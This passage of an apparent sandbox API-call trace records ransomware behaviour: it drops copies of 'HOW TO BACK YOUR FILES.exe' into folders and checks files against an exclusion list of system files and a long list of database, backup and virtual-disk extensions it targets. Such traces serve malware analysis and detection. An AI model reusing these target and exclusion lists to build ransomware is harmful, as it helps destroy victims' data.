cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0083.731] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0083.731] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c10 [0083.731] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages") returned="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages" [0083.731] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0083.731] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c08 | out: hHeap=0x2b0000) returned 1 [0083.731] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages") returned 63 [0083.731] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages") returned="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages" [0083.731] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0083.731] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\how to back your files.exe"), bFailIfExists=1) returned 0 [0083.732] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0083.732] GetLastError () returned 0x0 [0083.732] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0083.732] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0083.732] CloseHandle (hObject=0x120) returned 1 [0083.732] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0083.732] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0083.732] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c3ae300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c3ae300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0083.732] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.732] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0083.732] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0083.732] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x4c3ae300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c3ae300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.732] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.732] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0083.732] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0083.732] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0083.733] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x4c3ae300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c3ae300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="en-US", cAlternateFileName="")) returned 1 [0083.733] lstrcmpiW (lpString1="en-US", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.733] lstrcmpiW (lpString1="en-US", lpString2="aoldtz.exe") returned 1 [0083.733] lstrcmpiW (lpString1="en-US", lpString2=".") returned 1 [0083.733] lstrcmpiW (lpString1="en-US", lpString2="..") returned 1 [0083.733] lstrcmpiW (lpString1="en-US", lpString2="windows") returned -1 [0083.733] lstrcmpiW (lpString1="en-US", lpString2="bootmgr") returned 1 [0083.733] lstrcmpiW (lpString1="en-US", lpString2="temp") returned -1 [0083.733] lstrcmpiW (lpString1="en-US", lpString2="pagefile.sys") returned -1 [0083.733] lstrcmpiW (lpString1="en-US", lpString2="boot") returned 1 [0083.733] lstrcmpiW (lpString1="en-US", lpString2="ids.txt") returned -1 [0083.733] lstrcmpiW (lpString1="en-US", lpString2="ntuser.dat") returned -1 [0083.733] lstrcmpiW (lpString1="en-US", lpString2="perflogs") returned -1 [0083.733] lstrcmpiW (lpString1="en-US", lpString2="MSBuild") returned -1 [0083.733] lstrlenW (lpString="en-US") returned 5 [0083.733] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\*") returned 65 [0083.733] lstrcpyW (in: lpString1=0x2cce480, lpString2="en-US" | out: lpString1="en-US") returned="en-US" [0083.733] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7c08 [0083.733] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x8c) returned 0x320fc8 [0083.733] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7c10 | out: ListHead=0x2e7710, ListEntry=0x2e7c10) returned 0x2e7c50 [0083.733] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c3ae300, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c3ae300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0083.733] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0083.733] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4c3ae300, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4c3ae300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0083.733] FindClose (in: hFindFile=0x2ccf68 | out: hFindFile=0x2ccf68) returned 1 [0083.733] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7c10 [0083.733] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US", iMaxLength=260 | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US") returned="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US" [0083.733] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x320fc8 | out: hHeap=0x2b0000) returned 1 [0083.733] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7c08 | out: hHeap=0x2b0000) returned 1 [0083.733] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US") returned 69 [0083.733] lstrcatW (in: lpString1="", lpString2="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US" | out: lpString1="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US") returned="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US" [0083.733] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0083.733] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\all users\\microsoft\\windows nt\\msfax\\common coverpages\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0083.734] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0083.734] GetLastError () returned 0x0 [0083.734] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0083.734] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0083.734] CloseHandle (hObject=0x120) returned 1 [0083.734] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0083.734] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0083.734] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x4c3ae300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c3ae300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccf68 [0083.735] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.735] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0083.735] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0083.735] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x1d91b669, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x4c3ae300, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4c3ae300, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.735] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.735] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0083.735] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0083.735] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0083.735] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe3998d, ftCreationTime.dwHighDateTime=0x1cbf8ea, ftLastAccessTime.dwLowDateTime=0x10b3266c, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0xfe3998d, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x28aa, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="confident.cov", cAlternateFileName="")) returned 1 [0083.735] lstrcmpiW (lpString1="confident.cov", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0083.735] lstrcmpiW (lpString1="confident.cov", lpString2="aoldtz.exe") returned 1 [0083.735] lstrcmpiW (lpString1="confident.cov", lpString2=".") returned 1 [0083.735] lstrcmpiW (lpString1="confident.cov", lpString2="..") returned 1 [0083.735] lstrcmpiW (lpString1="confident.cov", lpString2="windows") returned -1 [0083.735] lstrcmpiW (lpString1="confident.cov", lpString2="bootmgr") returned 1 [0083.735] lstrcmpiW (lpString1="confident.cov", lpString2="temp") returned -1 [0083.735] lstrcmpiW (lpString1="confident.cov", lpString2="pagefile.sys") returned -1 [0083.735] lstrcmpiW (lpString1="confident.cov", lpString2="boot") returned 1 [0083.735] lstrcmpiW (lpString1="confident.cov", lpString2="ids.txt") returned -1 [0083.735] lstrcmpiW (lpString1="confident.cov", lpString2="ntuser.dat") returned -1 [0083.735] lstrcmpiW (lpString1="confident.cov", lpString2="perflogs") returned -1 [0083.735] lstrcmpiW (lpString1="confident.cov", lpString2="MSBuild") returned -1 [0083.735] lstrlenW (lpString="confident.cov") returned 13 [0083.735] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\Windows NT\\MSFax\\Common Coverpages\\en-US\\*") returned 71 [0083.735] lstrcpyW (in: lpString1=0x2cce48c, lpString2="confident.cov" | out: lpString1="confident.cov") returned="confident.cov" [0083.735] lstrlenW (lpString="confident.cov") returned 13 [0083.735] lstrlenW (lpString="Ares865") returned 7 [0083.735] lstrcmpiW (lpString1="ent.cov", lpString2="Ares865") returned 1 [0083.735] lstrlenW (lpString=".dll") returned 4 [0083.735] lstrcmpiW (lpString1="confident.cov", lpString2=".dll") returned 1 [0083.735] lstrlenW (lpString=".lnk") returned 4 [0083.735] lstrcmpiW (lpString1="confident.cov", lpString2=".lnk") returned 1 [0083.735] lstrlenW (lpString=".ini") returned 4 [0083.735] lstrcmpiW (lpString1="confident.cov", lpString2=".ini") returned 1 [0083.735] lstrlenW (lpString=".sys") returned 4 [0083.736] lstrcmpiW (lpString1="confident.cov", lpString2=".sys") returned 1 [0083.736] lstrlenW (lpString="confident.cov") returned 13 [0083.736] lstrlenW (lpString="bak") returned 3 [0083.736] lstrcmpiW (lpString1="cov", lpString2="bak") returned 1 [0083.736] lstrlenW (lpString="ba_") returned 3 [0083.736] lstrcmpiW (lpString1="cov", lpString2="ba_") returned 1 [0083.736] lstrlenW (lpString="dbb") returned 3 [0083.736] lstrcmpiW (lpString1="cov", lpString2="dbb") returned -1 [0083.736] lstrlenW (lpString="vmdk") returned 4 [0083.736] lstrcmpiW (lpString1=".cov", lpString2="vmdk") returned -1 [0083.736] lstrlenW (lpString="rar") returned 3 [0083.736] lstrcmpiW (lpString1="cov", lpString2="rar") returned -1 [0083.736] lstrlenW (lpString="zip") returned 3 [0083.736] lstrcmpiW (lpString1="cov", lpString2="zip") returned -1 [0083.736] lstrlenW (lpString="tgz") returned 3 [0083.736] lstrcmpiW (lpString1="cov", lpString2="tgz") returned -1 [0083.736] lstrlenW (lpString="vbox") returned 4 [0083.736] lstrcmpiW (lpString1=".cov", lpString2="vbox") returned -1 [0083.736] lstrlenW (lpString="vdi") returned 3 [0083.736] lstrcmpiW (lpString1="cov", lpString2="vdi") returned -1 [0083.736] lstrlenW (lpString="vhd") returned 3 [0083.736] lstrcmpiW (lpString1="cov", lpString2="vhd") returned -1 [0083.736] lstrlenW (lpString="vhdx") returned 4 [0083.736] lstrcmpiW (lpString1=".cov", lpString2="vhdx") returned -1 [0083.736] lstrlenW (lpString="avhd") returned 4 [0083.736] lstrcmpiW (lpString1=".cov", lpString2="avhd") returned -1 [0083.736] lstrlenW (lpString="db") returned 2 [0083.736] lstrcmpiW (lpString1="ov", lpString2="db") returned 1 [0083.736] lstrlenW (lpString="db2") returned 3 [0083.736] lstrcmpiW (lpString1="cov", lpString2="db2") returned -1 [0083.736] lstrlenW (lpString="db3") returned 3 [0083.736] lstrcmpiW (lpString1="cov", lpString2="db3") returned -1 [0083.736] lstrlenW (lpString="dbf") returned 3 [0083.736] lstrcmpiW (lpString1="cov", lpString2="dbf") returned -1 [0083.736] lstrlenW (lpString="mdf") returned 3 [0083.736] lstrcmpiW (lpString1="cov", lpString2="mdf") returned -1 [0083.736] lstrlenW (lpString="mdb") returned 3 [0083.736] lstrcmpiW (lpString1="cov", lpString2="mdb") returned -1 [0083.737] lstrlenW (lpString="sql") returned 3 [0083.737] lstrcmpiW (lpString1="cov", lpString2="sql") returned -1 [0083.737] lstrlenW (lpString="sqlite") returned 6 [0083.737] lstrcmpiW (lpString1="nt.cov", lpString2="sqlite") returned -1 [0083.737] lstrlenW (lpString="sqlite3") returned 7 [0083.737] lstrcmpiW (lpString1="ent.cov", lpString2="sqlite3") returned -1 [0083.737] lstrlenW (lpString="sqlitedb") returned 8 [0083.737] lstrcmpiW (lpString1="dent.cov", lpString2="sqlitedb") returned -1 [0083.737] lstrlenW (lpString="xml") returned 3 [0083.737] lstrcmpiW (lpString1="cov", lpString2="xml") returned -1 [0083.737] lstrlenW (lpString="$er") returned 3 [0083.737] lstrcmpiW (lpString1="cov", lpString2="$er") returned 1 [0083.737] lstrlenW (lpString="4dd") returned 3 [0083.737] lstrcmpiW (lpString1="cov", lpString2="4dd") returned 1 [0083.737] lstrlenW (lpString="4dl") returned 3 [0083.737] lstrcmpiW (lpString1="cov", lpString2="4dl") returned 1 [0083.737] lstrlenW (lpString="^^^") returned 3 [0083.737] lstrcmpiW (lpString1="cov", lpString2="^^^") returned 1 [0083.737] lstrlenW (lpString="abs") returned 3 [0083.737] lstrcmpiW (lpString1="cov", lpString2="abs") returned 1 [0083.737] lstrlenW (lpString="abx") returned 3 [0083.737] lstrcmpiW (lpString1="cov", lpString2="abx") returned 1 [0083.737] lstrlenW (lpString="accdb") returned 5 [0083.737] lstrcmpiW (lpString1="t.cov", lpString2="accdb") returned 1 [0083.737] lstrlenW (lpString="accdc") returned 5 [0083.737] lstrcmpiW (lpString1="t.cov", lpString2="accdc") returned 1 [0083.737] lstrlenW (lpString="accde") returned 5 [0083.737] lstrcmpiW (lpString1="t.cov", lpString2="accde") returned 1 [0083.737] lstrlenW (lpString="accdr") returned 5 [0083.737] lstrcmpiW (lpString1="t.cov", lpString2="accdr") returned 1 [0083.737] lstrlenW (lpString="accdt") returned 5 [0083.737] lstrcmpiW (lpString1="t.cov", lpString2="accdt") returned 1 [0083.737] lstrlenW (lpString="accdw") returned 5 [0083.737] lstrcmpiW (lpString1="t.cov", lpString2="accdw") returned 1 [0083.737] lstrlenW (lpString="accft") returned 5 [0083.737] lstrcmpiW (lpString1="t.cov", lpString2="accft") returned 1 [0083.737] lstrlenW (lpString="adb") returned 3 [0083.737] lstrcmpiW (lpString1="cov", lpString2="adb") returned 1 [0083.738] lstrlenW (lpString="adb") returned 3 [0083.738] lstrcmpiW (lpString1="cov", lpString2="adb") returned 1 [0083.738] lstrlenW (lpString="ade") returned 3 [0083.738] lstrcmpiW (lpString1="cov", lpString2="ade") returned 1 [0083.738] lstrlenW (lpString="adf") returned 3 [0083.738] lstrcmpiW (lpString1="cov", lpString2="adf") returned 1 [0083.738] lstrlenW (lpString="adn") returned 3 [0083.738] lstrcmpiW (lpString1="cov", lpString2="adn") returned 1 [0083.738] lstrlenW (lpString="adp") returned 3 [0083.738] lstrcmpiW (lpString1="cov", lpString2="adp") returned 1 [0083.738] lstrlenW (lpString="alf") returned 3 [0083.738] lstrcmpiW (lpString1="cov", lpString2="alf") returned 1 [0083.738] lstrlenW (lpString="ask") returned 3 [0083.738] lstrcmpiW (lpString1="cov", lpString2="ask") returned 1 [0083.738] lstrlenW (lpString="btr") returned 3 [0083.738] lstrcmpiW (lpString1="cov", lpString2="btr") returned 1 [0083.738] lstrlenW (lpString="cat") returned 3 [0083.738] lstrcmpiW (lpString1="cov", lpString2="cat") returned 1 [0083.738] lstrlenW (lpString="cdb") returned 3 [0083.738] lstrcmpiW (lpString1="cov", lpString2="cdb") returned 1 [0083.738] lstrlenW (lpString="ckp") returned 3 [0083.738] lstrcmpiW (lpString1="cov", lpString2="ckp") returned 1 [0083.738] lstrlenW (lpString="cma") returned 3 [0083.738] lstrcmpiW (lpString1="cov", lpString2="cma") returned 1 [0083.738] lstrlenW (lpString="cpd") returned 3 [0083.738] lstrcmpiW (lpString1="cov", lpString2="cpd") returned -1 [0083.738] lstrlenW (lpString="dacpac") returned 6 [0083.738] lstrcmpiW (lpString1="nt.cov", lpString2="dacpac") returned 1 [0083.738] lstrlenW (lpString="dad") returned 3 [0083.738] lstrcmpiW (lpString1="cov", lpString2="dad") returned -1 [0083.738] lstrlenW (lpString="dadiagrams") returned 10 [0083.738] lstrcmpiW (lpString1="fident.cov", lpString2="dadiagrams") returned 1 [0083.738] lstrlenW (lpString="daschema") returned 8 [0083.738] lstrcmpiW (lpString1="dent.cov", lpString2="daschema") returned 1 [0083.738] lstrlenW (lpString="db-journal") returned 10 [0083.738] lstrcmpiW (lpString1="fident.cov", lpString2="db-journal") returned 1 [0083.738] lstrlenW (lpString="db-shm") returned 6 [0083.739] lstrcmpiW (lpString1="nt.cov", lpString2="db-shm") returned 1 [0083.739] lstrlenW (lpString="db-wal") returned 6 [0083.739] lstrcmpiW (lpString1="nt.cov", lpString2="db-wal") returned 1 [0083.739] lstrlenW (lpString="dbc") returned 3 [0083.739] lstrcmpiW (lpString1="cov", lpString2="dbc") returned -1 [0083.739] lstrlenW (lpString="dbs") returned 3 [0083.739] lstrcmpiW (lpString1="cov", lpString2="dbs") returned -1 [0083.739] lstrlenW (lpString="dbt") returned 3 [0083.739] lstrcmpiW (lpString1="cov", lpString2="dbt") returned -1 [0083.739] lstrlenW (lpString="dbv") returned 3 [0083.739] lstrcmpiW (lpString1="cov", lpString2="dbv") returned -1 [0083.739] lstrlenW (lpString="dbx") returned 3 [0083.739] lstrcmpiW (lpString1="cov", lpString2="dbx") returned -1 [0083.739] lstrlenW (lpString="dcb") returned 3 [0083.739] lstrcmpiW (lpString1="cov", lpString2="dcb") returned -1 [0083.739] lstrlenW (lpString="dct") returned 3 [0083.739] lstrcmpiW (lpString1="cov", lpString2="dct") returned -1 [0083.739] lstrlenW (lpString="dcx") returned 3 [0083.739] lstrcmpiW (lpString1="cov", lpString2="dcx") returned -1 [0083.739] lstrlenW (lpString="ddl") returned 3 [0083.739] lstrcmpiW (lpString1="cov", lpString2="ddl") returned -1 [0083.739] lstrlenW (lpString="dlis") returned 4 [0083.739] lstrcmpiW (lpString1=".cov", lpString2="dlis") returned -1 [0083.739] lstrlenW (lpString="dp1") returned 3 [0083.739] lstrcmpiW (lpString1="cov", lpString2="dp1") returned -1 [0083.739] lstrlenW (lpString="dqy") returned 3 [0083.739] lstrcmpiW (lpString1="cov", lpString2="dqy") returned -1 [0083.739] lstrlenW (lpString="dsk") returned 3 [0083.739] lstrcmpiW (lpString1="cov", lpString2="dsk") returned -1 [0083.739] lstrlenW (lpString="dsn") returned 3 [0083.739] lstrcmpiW (lpString1="cov", lpString2="dsn") returned -1 [0083.739] lstrlenW (lpString="dtsx") returned 4 [0083.739] lstrcmpiW (lpString1=".cov", lpString2="dtsx") returned -1 [0083.739] lstrlenW (lpString="dxl") returned 3 [0083.739] lstrcmpiW (lpString1="cov", lpString2="dxl") returned -1 [0083.739] lstrlenW (lpString="eco") returned 3 [0083.739] lstrcmpiW (lpString1="cov", lpString2="eco") returned -1 [0083.739] lstrlenW (lpString="ecx") returned 3 [0083.740] lstrcmpiW (lpString1="cov", lpString2="ecx") returned -1 [0083.740] lstrlenW (lpString="edb") returned 3 [0083.740] lstrcmpiW (lpString1="cov", lpString2="edb") returned -1 [0083.740] lstrlenW (lpString="epim") returned 4 [0083.740] lstrcmpiW (lpString1=".cov", lpString2="epim") returned -1 [0083.740] lstrlenW (lpString="fcd") returned 3 [0083.740] lstrcmpiW (lpString1="cov", lpString2="fcd") returned -1 [0083.740] lstrlenW (lpString="fdb") returned 3 [0083.740] lstrcmpiW (lpString1="cov", lpString2="fdb") returned -1 [0083.740] lstrlenW (lpString="fic") returned 3 [0083.740] lstrcmpiW (lpString1="cov", lpString2="fic") returned -1 [0083.740] lstrlenW (lpString="flexolibrary") returned 12 [0083.740] lstrcmpiW (lpString1="onfident.cov", lpString2="flexolibrary") returned 1 [0083.740] lstrlenW (lpString="fm5") returned 3 [0083.740] lstrcmpiW (lpString1="cov", lpString2="fm5") returned -1 [0083.740] lstrlenW (lpString="fmp") returned 3 [0083.740] lstrcmpiW (lpString1="cov", lpString2="fmp") returned -1 [0083.740] lstrlenW (lpString="fmp12") returned 5 [0083.740] lstrcmpiW (lpString1="t.cov", lpString2="fmp12") returned 1 [0083.740] lstrlenW (lpString="fmpsl") returned 5 [0083.740] lstrcmpiW (lpString1="t.cov", lpString2="fmpsl") returned 1 [0083.740] lstrlenW (lpString="fol") returned 3 [0083.740] lstrcmpiW (lpString1="cov", lpString2="fol") returned -1 [0083.740] lstrlenW (lpString="fp3") returned 3 [0083.740] lstrcmpiW (lpString1="cov", lpString2="fp3") returned -1 [0083.740] lstrlenW (lpString="fp4") returned 3 [0083.740] lstrcmpiW (lpString1="cov", lpString2="fp4") returned -1 [0083.740] lstrlenW (lpString="fp5") returned 3 [0083.740] lstrcmpiW (lpString1="cov", lpString2="fp5") returned -1 [0083.740] lstrlenW (lpString="fp7") returned 3 [0083.740] lstrcmpiW (lpString1="cov", lpString2="fp7") returned -1 [0083.740] lstrlenW (lpString="fpt") returned 3 [0083.740] lstrcmpiW (lpString1="cov", lpString2="fpt") returned -1 [0083.740] lstrlenW (lpString="frm") returned 3 [0083.740] lstrcmpiW (lpString1="cov", lpString2="frm") returned -1 [0083.740] lstrlenW (lpString="gdb") returned 3 [0083.740] lstrcmpiW (lpString1="cov", lpString2="gdb") returned -1 [0083.740] lstrlenW (lpString="gdb") returned 3 [0083.741] lstrcmpiW (lpString1="cov", lpString2="gdb") returned -1 [0083.741] lstrlenW (lpString="grdb") returned 4 [0083.741] lstrcmpiW (lpString1=".cov", lpString2="grdb") returned -1 [0083.741] lstrlenW (lpString="gwi") returned 3 [0083.741] lstrcmpiW (lpString1="cov", lpString2="gwi") returned -1 [0083.741] lstrlenW (lpString="hdb") returned 3 [0083.741] lstrcmpiW (lpString1="cov", lpString2="hdb") returned -1 [0083.741] lstrlenW (lpString="his") returned 3 [0083.741] lstrcmpiW (lpString1="cov", lpString2="his") returned -1 [0083.741] lstrlenW (lpString="ib") returned 2 [0083.741] lstrcmpiW (lpString1="ov", lpString2="ib") returned 1 [0083.741] lstrlenW (lpString="idb") returned 3 [0083.741] lstrcmpiW (lpString1="cov", lpString2="idb") returned -1 [0083.741] lstrlenW (lpString="ihx") returned 3 [0083.741] lstrcmpiW (lpString1="cov", lpString2="ihx") returned -1 [0083.741] lstrlenW (lpString="itdb") returned 4 [0083.741] lstrcmpiW (lpString1=".cov", lpString2="itdb") returned -1 [0083.741] lstrlenW (lpString="itw") returned 3 [0083.741] lstrcmpiW (lpString1="cov", lpString2="itw") returned -1 [0083.741] lstrlenW (lpString="jet") returned 3 [0083.741] lstrcmpiW (lpString1="cov", lpString2="jet") returned -1 [0083.741] lstrlenW 